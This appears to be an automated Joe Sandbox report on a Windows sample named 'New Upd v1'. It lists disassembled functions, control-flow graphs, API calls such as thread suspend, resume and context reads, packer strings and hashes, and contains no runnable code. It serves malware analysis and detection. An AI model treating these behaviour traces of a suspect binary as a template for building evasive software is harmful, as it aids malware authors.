                                                                                control_flow_graph 934 7ec400-7ec41d GetWindowThreadProcessId 935 7ec4e6-7ec4ed 934->935 936 7ec423-7ec42c 934->936 937 7ec4ef-7ec4f1 935->937 938 7ec4f5 935->938 936->935 939 7ec432-7ec43c call 7ebc70 936->939 940 7ec4fa-7ec4fd 937->940 938->940 943 7ec43e-7ec491 GlobalAddAtomW * 2 SendMessageW 939->943 944 7ec493-7ec4e0 GlobalAddAtomA * 2 SendMessageA 939->944 943->935 944->935
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007EC40E
                                                                                  • Part of subcall function 007EBC70: GetVersionExA.KERNEL32(00000094), ref: 007EBC9F
                                                                                • GlobalAddAtomW.KERNEL32(00846B84), ref: 007EC443
                                                                                • GlobalAddAtomW.KERNEL32(System), ref: 007EC452
                                                                                • SendMessageW.USER32(?,000003E0,00000000,00000000), ref: 007EC48B
                                                                                • GlobalAddAtomA.KERNEL32(0084697C), ref: 007EC498
                                                                                • GlobalAddAtomA.KERNEL32(System), ref: 007EC4A7
                                                                                • SendMessageA.USER32(?,000003E0,00000000,00000000), ref: 007EC4E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: AtomGlobal$MessageSend$ProcessThreadVersionWindow
                                                                                • String ID: System$System
                                                                                • API String ID: 3220657938-2206101080
                                                                                • Opcode ID: 6f65edbfa7a7676e9af29873a0e40fe9525a1573b329423d4e6ad7669ed95b42
                                                                                • Instruction ID: 276d932580bb3a02d4c7ad8e6d1f2379ba31daf87bc9cf70e9f67a240dce3fae
                                                                                • Opcode Fuzzy Hash: 6f65edbfa7a7676e9af29873a0e40fe9525a1573b329423d4e6ad7669ed95b42
                                                                                • Instruction Fuzzy Hash: 9F2100385012A9EBD714DFA5D8549BE7F75FF89301F008424F842CA2D0D3BC8940DB61

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1089 814022-814049 getSystemCP 1090 814059-81405c 1089->1090 1091 81404b-814054 setSBCS 1089->1091 1093 81405e-814064 1090->1093 1092 8141ec-8141f3 1091->1092 1096 8141f4 call 80b245 1092->1096 1094 8140fb-81411f _memset 1093->1094 1095 81406a-814075 1093->1095 1097 81414b-81414e 1094->1097 1095->1093 1098 814077-81407d 1095->1098 1099 8141f9 1096->1099 1100 814121-814126 1097->1100 1101 814150-814160 1097->1101 1102 814083-814089 1098->1102 1103 8141e9 1098->1103 1100->1101 1104 814128-81412e 1100->1104 1101->1097 1105 814162-814181 call 813cf6 1101->1105 1102->1103 1106 81408f-81409b IsValidCodePage 1102->1106 1103->1092 1107 814142-814144 1104->1107 1115 814182-81418d 1105->1115 1106->1103 1109 8140a1-8140ae GetCPInfo 1106->1109 1110 814130-814141 1107->1110 1111 814146-81414a 1107->1111 1113 8140b4-8140d2 _memset 1109->1113 1114 8141dd-8141e3 1109->1114 1110->1107 1111->1097 1116 8141d0 1113->1116 1117 8140d8-8140dc 1113->1117 1114->1091 1114->1103 1115->1115 1119 81418f-814191 setSBUpLow 1115->1119 1118 8141d3-8141db 1116->1118 1120 8141b1-8141b4 1117->1120 1121 8140e2 1117->1121 1118->1119 1125 81419b-8141a0 1119->1125 1122 8141b9-8141be 1120->1122 1123 8140e5-8140e9 1121->1123 1122->1122 1124 8141c0-8141ce call 813cf6 1122->1124 1123->1120 1126 8140ef-8140f6 1123->1126 1124->1118 1127 8141a1-8141a3 1125->1127 1126->1127 1127->1125 1129 8141a5-8141ab 1127->1129 1129->1120 1129->1123
                                                                                APIs
                                                                                • getSystemCP.LIBCMT ref: 0081403B
                                                                                  • Part of subcall function 00813FA8: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00813FB5
                                                                                  • Part of subcall function 00813FA8: GetOEMCP.KERNEL32(00000000), ref: 00813FCF
                                                                                • setSBCS.LIBCMT ref: 0081404D
                                                                                  • Part of subcall function 00813D25: _memset.LIBCMT ref: 00813D38
                                                                                • IsValidCodePage.KERNEL32(-00000030), ref: 00814093
                                                                                • GetCPInfo.KERNEL32(00000000,?), ref: 008140A6
                                                                                • _memset.LIBCMT ref: 008140BE
                                                                                • setSBUpLow.LIBCMT ref: 00814191
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                • String ID:
                                                                                • API String ID: 2658552758-0
                                                                                • Opcode ID: 252f4f5e881f79168b0602d29eed467c25c90aa4ca32ac7f38733c29fe212f97
                                                                                • Instruction ID: 67e817c1eacfded6075ed443f06bc880645e1272c2a681e42cee45694bd1d914
                                                                                • Opcode Fuzzy Hash: 252f4f5e881f79168b0602d29eed467c25c90aa4ca32ac7f38733c29fe212f97
                                                                                • Instruction Fuzzy Hash: 15511471900219ABCF158F69C8806FEBBB8FF55304F14906AD886EF242D67889C2CB91

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1131 7f93c0-7f93f1 call 7f8cb0 1134 7f93fa-7f9401 1131->1134 1135 7f93f3-7f93f5 1131->1135 1137 7f941c-7f9429 SetTimer 1134->1137 1138 7f9403-7f9417 GetTickCount 1134->1138 1136 7f947f-7f9482 1135->1136 1139 7f942f-7f943b IsWindow 1137->1139 1138->1137 1140 7f947d 1139->1140 1141 7f943d-7f9453 PeekMessageA 1139->1141 1140->1136 1142 7f9455-7f9459 1141->1142 1143 7f9473-7f9475 Sleep 1141->1143 1144 7f945d-7f9471 TranslateMessage DispatchMessageA 1142->1144 1145 7f945b 1142->1145 1146 7f947b 1143->1146 1144->1146 1145->1140 1146->1139
                                                                                APIs
                                                                                  • Part of subcall function 007F8CB0: GetTickCount.KERNEL32 ref: 007F8D41
                                                                                  • Part of subcall function 007F8CB0: CreateThread.KERNEL32(00000000,00000000,007F93C0,00000000,00000000,0084739C), ref: 007F8D64
                                                                                  • Part of subcall function 007F8CB0: CloseHandle.KERNEL32(00000000), ref: 007F8D6B
                                                                                  • Part of subcall function 007F8CB0: GetTickCount.KERNEL32 ref: 007F8D7C
                                                                                  • Part of subcall function 007F8CB0: Sleep.KERNEL32(00000001), ref: 007F8D8C
                                                                                • GetTickCount.KERNEL32 ref: 007F9403
                                                                                • SetTimer.USER32(00000000,00000001,000000FA,00000000), ref: 007F9429
                                                                                • IsWindow.USER32(00000000), ref: 007F9433
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 007F944B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: CountTick$CloseCreateHandleMessagePeekSleepThreadTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 3369590426-0
                                                                                • Opcode ID: ab18d9bda72e5a07cad87f1cfc4b10e63204dc84d4420692d0a0e384ebeae15a
                                                                                • Instruction ID: bcad65188fa0a02070999f7c617e324aa683b51ea9c9054e53fd2bf1a3071840
                                                                                • Opcode Fuzzy Hash: ab18d9bda72e5a07cad87f1cfc4b10e63204dc84d4420692d0a0e384ebeae15a
                                                                                • Instruction Fuzzy Hash: 81219AB1A14248ABDF14DFA0EC49FBB77B8BB58700F104918FB56E6390D7B89441DB61

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1147 7ff4e0-7ff4f8 LoadLibraryA 1148 7ff53a-7ff53c 1147->1148 1149 7ff4fa-7ff510 GetProcAddress 1147->1149 1149->1148 1150 7ff512-7ff537 GetDesktopWindow 1149->1150 1150->1148
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,?,?,?,?,?,?,00000000,007F25CE,00000000), ref: 007FF4EB
                                                                                • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 007FF503
                                                                                • GetDesktopWindow.USER32 ref: 007FF520
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: AddressDesktopLibraryLoadProcWindow
                                                                                • String ID: COMCTL32.DLL$_TrackMouseEvent
                                                                                • API String ID: 3665478104-1888676618
                                                                                • Opcode ID: 189bfe74c16089025db40e2958dc4be473a35d2148c2771a8c8351e11f6784bd
                                                                                • Instruction ID: 5bbec7754704c7219e6751716e096b43bf2c0a5a4c236c25abe91a43ac4cb49f
                                                                                • Opcode Fuzzy Hash: 189bfe74c16089025db40e2958dc4be473a35d2148c2771a8c8351e11f6784bd
                                                                                • Instruction Fuzzy Hash: 3CF0B774C01208EBCB04EFE8D9197AEBB74FB14315F1046A8D962A3290D7B94695DB91
                                                                                APIs
                                                                                  • Part of subcall function 007FA6D0: GetExitCodeProcess.KERNEL32(?,008475B8), ref: 007FA6DC
                                                                                • ResumeThread.KERNEL32(?), ref: 007FF38F
                                                                                • Sleep.KERNEL32(00000064), ref: 007FF397
                                                                                • SuspendThread.KERNEL32(?), ref: 007FF3A4
                                                                                • _memset.LIBCMT ref: 007FF3B8
                                                                                • GetThreadContext.KERNEL32(?,00010001), ref: 007FF3D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CodeContextExitProcessResumeSleepSuspend_memset
                                                                                • String ID:
                                                                                • API String ID: 1781661147-0
                                                                                • Opcode ID: 829708fc911f4993b926b08ff23e950ea740bb4bd57a57c363a0af0572e1f727
                                                                                • Instruction ID: a0a6ea4dc3feac34afa0a0c6d285296e7f42bad7ed3192555ee747e392cb9edc
                                                                                • Opcode Fuzzy Hash: 829708fc911f4993b926b08ff23e950ea740bb4bd57a57c363a0af0572e1f727
                                                                                • Instruction Fuzzy Hash: 9011C271A00208AFCB18EF64D888EAD7775FF88300F008154FA4A9B391DF74E940CB92
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,007EC070,00000000,00000000,?), ref: 007EC027
                                                                                • CloseHandle.KERNEL32(?), ref: 007EC034
                                                                                • IsWindow.USER32(00000000), ref: 007EC047
                                                                                • Sleep.KERNEL32(00000001), ref: 007EC053
                                                                                • Sleep.KERNEL32(00000064), ref: 007EC05D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep$CloseCreateHandleThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 3655506807-0
                                                                                • Opcode ID: 08d4a349b378876cd2784f22441589663c15c5f23e430659d4e43ae225fc0e87
                                                                                • Instruction ID: 8e3f3b41163ef90d7219e154b83e5a7fd31986a96b06c08e7f7e55c5e088d836
                                                                                • Opcode Fuzzy Hash: 08d4a349b378876cd2784f22441589663c15c5f23e430659d4e43ae225fc0e87
                                                                                • Instruction Fuzzy Hash: 0DF0E238645304FBDB209FA1DC0EBAE7774B789B01F104484F601A61C0D6F9AA42DB61
                                                                                APIs
                                                                                • SetWindowTextA.USER32(00000110,008470F8), ref: 007F3037
                                                                                • GetDlgItem.USER32(00000110,000003EA), ref: 007F304A
                                                                                • SetWindowTextA.USER32(00000000), ref: 007F3051
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: TextWindow$Item
                                                                                • String ID: Loading...
                                                                                • API String ID: 1634842743-3445898995
                                                                                • Opcode ID: 5906dc445cf9db498859a6a3d7e06ace8756b8cfeeaccafda5536444daaf6db5
                                                                                • Instruction ID: c2fc32c443de50418ba4164fedacf4e44582cf6b019e6625c3e6b2ae855889ef
                                                                                • Opcode Fuzzy Hash: 5906dc445cf9db498859a6a3d7e06ace8756b8cfeeaccafda5536444daaf6db5
                                                                                • Instruction Fuzzy Hash: DCF0823450050CFBCB00DFB4D8488AE7BB9EB48300F108916FA52A7280C7B49A40CB90
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007F1401
                                                                                • GetEnvironmentVariableA.KERNEL32(ARMSPLASHOFF,?,00000100), ref: 007F141A
                                                                                  • Part of subcall function 007F2F80: ShowWindow.USER32(00000000,00000005), ref: 007F2FEE
                                                                                  • Part of subcall function 007F2F80: UpdateWindow.USER32(00000000), ref: 007F2FF8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: Window$EnvironmentShowUpdateVariable_memset
                                                                                • String ID: ARMSPLASHOFF
                                                                                • API String ID: 2789383349-2711264934
                                                                                • Opcode ID: 852c8fda12c7d0ae7b35b95cf8387734143f94272fd5f4cec3cd77582f6f8fef
                                                                                • Instruction ID: a2c6d364536c8180e2c0db13806f2378c315acd654ed19840a2ffff559dd83c6
                                                                                • Opcode Fuzzy Hash: 852c8fda12c7d0ae7b35b95cf8387734143f94272fd5f4cec3cd77582f6f8fef
                                                                                • Instruction Fuzzy Hash: 1D716AB490429CDBCF28CF18C8917FD7BB1AF89344F548099EA5A9B341D7789A90CF91
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 007EF316
                                                                                  • Part of subcall function 007ED630: _memcpy_s.LIBCMT ref: 007ED678
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 007EF414
                                                                                  • Part of subcall function 007EDD70: _strlen.LIBCMT ref: 007EDD8F
                                                                                  • Part of subcall function 0080D2D2: RaiseException.KERNEL32(?,?,0080AAEA,?,?,?,?,?,0080AAEA,?,0084375C,00847B60), ref: 0080D312
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: std::_$ExceptionLocinfo::_Locinfo_ctorLockitLockit::_Raise_memcpy_s_strlen
                                                                                • String ID: bad locale name
                                                                                • API String ID: 1176334253-1405518554
                                                                                • Opcode ID: 80953662d2d8bb17aefaf19f12b9eeffbad3744a0656f8d511ba24257812c4ca
                                                                                • Instruction ID: 8d657ce267107e7a44bcc7653222e4eeb43254b2466b0d3d6d3d23c9580ed2f3
                                                                                • Opcode Fuzzy Hash: 80953662d2d8bb17aefaf19f12b9eeffbad3744a0656f8d511ba24257812c4ca
                                                                                • Instruction Fuzzy Hash: 3C412570A40298EBEB24DFA4CC56BEDBB70AB44704F1081A9E1096B2C1D7B42E48CF91